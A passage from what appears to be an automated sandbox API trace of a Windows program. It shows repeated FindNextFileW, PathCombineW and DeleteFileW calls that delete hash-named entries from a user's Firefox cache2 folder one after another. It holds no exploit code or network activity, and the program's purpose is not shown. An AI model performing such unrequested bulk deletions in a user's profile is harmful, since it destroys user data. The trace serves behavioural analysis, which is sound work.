hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.400] lstrlenW (lpString="085CFB45496B3087ABCB8ABD8529B3EB41D17C27") returned 40 [0253.400] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="085CFB45496B3087ABCB8ABD8529B3EB41D17C27" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\085CFB45496B3087ABCB8ABD8529B3EB41D17C27") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\085CFB45496B3087ABCB8ABD8529B3EB41D17C27" [0253.400] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\085CFB45496B3087ABCB8ABD8529B3EB41D17C27" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\085cfb45496b3087abcb8abd8529b3eb41d17c27")) returned 1 [0253.401] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.401] lstrlenW (lpString="0A1144B8734850F5325AA6C259041EA8A201062C") returned 40 [0253.401] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="0A1144B8734850F5325AA6C259041EA8A201062C" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0A1144B8734850F5325AA6C259041EA8A201062C") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0A1144B8734850F5325AA6C259041EA8A201062C" [0253.401] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0A1144B8734850F5325AA6C259041EA8A201062C" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\0a1144b8734850f5325aa6c259041ea8a201062c")) returned 1 [0253.402] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.402] lstrlenW (lpString="0A774848D5BE9E32A6789642784FD4DAFCD580F5") returned 40 [0253.402] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="0A774848D5BE9E32A6789642784FD4DAFCD580F5" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0A774848D5BE9E32A6789642784FD4DAFCD580F5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0A774848D5BE9E32A6789642784FD4DAFCD580F5" [0253.402] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0A774848D5BE9E32A6789642784FD4DAFCD580F5" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\0a774848d5be9e32a6789642784fd4dafcd580f5")) returned 1 [0253.403] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.403] lstrlenW (lpString="0A9B36C9F5BCA2621C56BD4B714A9141238CF27D") returned 40 [0253.403] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="0A9B36C9F5BCA2621C56BD4B714A9141238CF27D" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0A9B36C9F5BCA2621C56BD4B714A9141238CF27D") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0A9B36C9F5BCA2621C56BD4B714A9141238CF27D" [0253.403] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0A9B36C9F5BCA2621C56BD4B714A9141238CF27D" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\0a9b36c9f5bca2621c56bd4b714a9141238cf27d")) returned 1 [0253.404] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.406] lstrlenW (lpString="0ADCF0E2A022CEDF8D199ED2889DB295128C4E25") returned 40 [0253.406] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="0ADCF0E2A022CEDF8D199ED2889DB295128C4E25" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0ADCF0E2A022CEDF8D199ED2889DB295128C4E25") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0ADCF0E2A022CEDF8D199ED2889DB295128C4E25" [0253.406] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0ADCF0E2A022CEDF8D199ED2889DB295128C4E25" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\0adcf0e2a022cedf8d199ed2889db295128c4e25")) returned 1 [0253.407] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.407] lstrlenW (lpString="0B55D23F82EE119DC0472267436CD5F2868E3B14") returned 40 [0253.407] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="0B55D23F82EE119DC0472267436CD5F2868E3B14" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0B55D23F82EE119DC0472267436CD5F2868E3B14") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0B55D23F82EE119DC0472267436CD5F2868E3B14" [0253.407] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0B55D23F82EE119DC0472267436CD5F2868E3B14" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\0b55d23f82ee119dc0472267436cd5f2868e3b14")) returned 1 [0253.408] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.408] lstrlenW (lpString="0BCD5C644E4A81783F24DB39416D1CE0CA0C3015") returned 40 [0253.408] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="0BCD5C644E4A81783F24DB39416D1CE0CA0C3015" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0BCD5C644E4A81783F24DB39416D1CE0CA0C3015") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0BCD5C644E4A81783F24DB39416D1CE0CA0C3015" [0253.408] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0BCD5C644E4A81783F24DB39416D1CE0CA0C3015" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\0bcd5c644e4a81783f24db39416d1ce0ca0c3015")) returned 1 [0253.409] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.409] lstrlenW (lpString="0CFEB549E537F8B2151A62BA069AE7A6D363BB90") returned 40 [0253.409] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="0CFEB549E537F8B2151A62BA069AE7A6D363BB90" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0CFEB549E537F8B2151A62BA069AE7A6D363BB90") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0CFEB549E537F8B2151A62BA069AE7A6D363BB90" [0253.409] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0CFEB549E537F8B2151A62BA069AE7A6D363BB90" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\0cfeb549e537f8b2151a62ba069ae7a6d363bb90")) returned 1 [0253.410] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.410] lstrlenW (lpString="0D1B36E62742C7776D68B1240296D02DFD6478FF") returned 40 [0253.410] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="0D1B36E62742C7776D68B1240296D02DFD6478FF" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0D1B36E62742C7776D68B1240296D02DFD6478FF") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0D1B36E62742C7776D68B1240296D02DFD6478FF" [0253.410] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0D1B36E62742C7776D68B1240296D02DFD6478FF" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\0d1b36e62742c7776d68b1240296d02dfd6478ff")) returned 1 [0253.412] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.412] lstrlenW (lpString="0D83D658A0C069047F6B9FD30BFDEDD80863B5F0") returned 40 [0253.412] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="0D83D658A0C069047F6B9FD30BFDEDD80863B5F0" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0D83D658A0C069047F6B9FD30BFDEDD80863B5F0") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0D83D658A0C069047F6B9FD30BFDEDD80863B5F0" [0253.412] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0D83D658A0C069047F6B9FD30BFDEDD80863B5F0" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\0d83d658a0c069047f6b9fd30bfdedd80863b5f0")) returned 1 [0253.412] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.412] lstrlenW (lpString="0E030AE41B2AB97664B455929A8A0721BA5D1F69") returned 40 [0253.412] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="0E030AE41B2AB97664B455929A8A0721BA5D1F69" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0E030AE41B2AB97664B455929A8A0721BA5D1F69") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0E030AE41B2AB97664B455929A8A0721BA5D1F69" [0253.412] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0E030AE41B2AB97664B455929A8A0721BA5D1F69" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\0e030ae41b2ab97664b455929a8a0721ba5d1f69")) returned 1 [0253.413] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.413] lstrlenW (lpString="0E331C2EF53B5C952B79B038C00588087D45A128") returned 40 [0253.413] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="0E331C2EF53B5C952B79B038C00588087D45A128" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0E331C2EF53B5C952B79B038C00588087D45A128") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0E331C2EF53B5C952B79B038C00588087D45A128" [0253.414] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0E331C2EF53B5C952B79B038C00588087D45A128" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\0e331c2ef53b5c952b79b038c00588087d45a128")) returned 1 [0253.415] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.415] lstrlenW (lpString="0EC55DA246CC743C7EEA604EB85A206384B78D8F") returned 40 [0253.415] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="0EC55DA246CC743C7EEA604EB85A206384B78D8F" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0EC55DA246CC743C7EEA604EB85A206384B78D8F") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0EC55DA246CC743C7EEA604EB85A206384B78D8F" [0253.415] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0EC55DA246CC743C7EEA604EB85A206384B78D8F" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\0ec55da246cc743c7eea604eb85a206384b78d8f")) returned 1 [0253.418] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.418] lstrlenW (lpString="0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F") returned 40 [0253.418] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F" [0253.418] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\0eddf8c091e2fed62e44bedddc1723f5bf38fe4f")) returned 1 [0253.419] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.419] lstrlenW (lpString="0EFA10E4516ACC80858411CA65A3CFF2B1AB347D") returned 40 [0253.419] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="0EFA10E4516ACC80858411CA65A3CFF2B1AB347D" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0EFA10E4516ACC80858411CA65A3CFF2B1AB347D") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0EFA10E4516ACC80858411CA65A3CFF2B1AB347D" [0253.419] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0EFA10E4516ACC80858411CA65A3CFF2B1AB347D" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\0efa10e4516acc80858411ca65a3cff2b1ab347d")) returned 1 [0253.420] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.420] lstrlenW (lpString="0FCD257674B1DEC53E0617114C11061F0395BE84") returned 40 [0253.420] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="0FCD257674B1DEC53E0617114C11061F0395BE84" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0FCD257674B1DEC53E0617114C11061F0395BE84") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0FCD257674B1DEC53E0617114C11061F0395BE84" [0253.420] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0FCD257674B1DEC53E0617114C11061F0395BE84" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\0fcd257674b1dec53e0617114c11061f0395be84")) returned 1 [0253.422] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.422] lstrlenW (lpString="0FEE7E531224DDC68090378EA0DD267E4A43A052") returned 40 [0253.422] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="0FEE7E531224DDC68090378EA0DD267E4A43A052" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0FEE7E531224DDC68090378EA0DD267E4A43A052") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0FEE7E531224DDC68090378EA0DD267E4A43A052" [0253.422] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0FEE7E531224DDC68090378EA0DD267E4A43A052" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\0fee7e531224ddc68090378ea0dd267e4a43a052")) returned 1 [0253.423] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.423] lstrlenW (lpString="10242BACB3A923DC9924A5B41FC879A31AF03963") returned 40 [0253.423] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="10242BACB3A923DC9924A5B41FC879A31AF03963" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\10242BACB3A923DC9924A5B41FC879A31AF03963") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\10242BACB3A923DC9924A5B41FC879A31AF03963" [0253.423] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\10242BACB3A923DC9924A5B41FC879A31AF03963" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\10242bacb3a923dc9924a5b41fc879a31af03963")) returned 1 [0253.423] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.423] lstrlenW (lpString="102DC0B203B92AE5ADA25E34CEB5788226CA2769") returned 40 [0253.423] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="102DC0B203B92AE5ADA25E34CEB5788226CA2769" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\102DC0B203B92AE5ADA25E34CEB5788226CA2769") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\102DC0B203B92AE5ADA25E34CEB5788226CA2769" [0253.423] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\102DC0B203B92AE5ADA25E34CEB5788226CA2769" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\102dc0b203b92ae5ada25e34ceb5788226ca2769")) returned 1 [0253.425] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.425] lstrlenW (lpString="102E001FB34D784FBF727701C7932E3FC58AF45D") returned 40 [0253.425] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="102E001FB34D784FBF727701C7932E3FC58AF45D" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\102E001FB34D784FBF727701C7932E3FC58AF45D") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\102E001FB34D784FBF727701C7932E3FC58AF45D" [0253.425] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\102E001FB34D784FBF727701C7932E3FC58AF45D" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\102e001fb34d784fbf727701c7932e3fc58af45d")) returned 1 [0253.427] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.427] lstrlenW (lpString="108573E2B07FF25FFCAFE37F58D375561A47424D") returned 40 [0253.427] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="108573E2B07FF25FFCAFE37F58D375561A47424D" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\108573E2B07FF25FFCAFE37F58D375561A47424D") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\108573E2B07FF25FFCAFE37F58D375561A47424D" [0253.427] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\108573E2B07FF25FFCAFE37F58D375561A47424D" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\108573e2b07ff25ffcafe37f58d375561a47424d")) returned 1 [0253.429] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.429] lstrlenW (lpString="116D5E76041E1DFC3004D30FEEB76351BB9D361F") returned 40 [0253.429] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="116D5E76041E1DFC3004D30FEEB76351BB9D361F" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\116D5E76041E1DFC3004D30FEEB76351BB9D361F") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\116D5E76041E1DFC3004D30FEEB76351BB9D361F" [0253.430] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\116D5E76041E1DFC3004D30FEEB76351BB9D361F" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\116d5e76041e1dfc3004d30feeb76351bb9d361f")) returned 1 [0253.431] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: 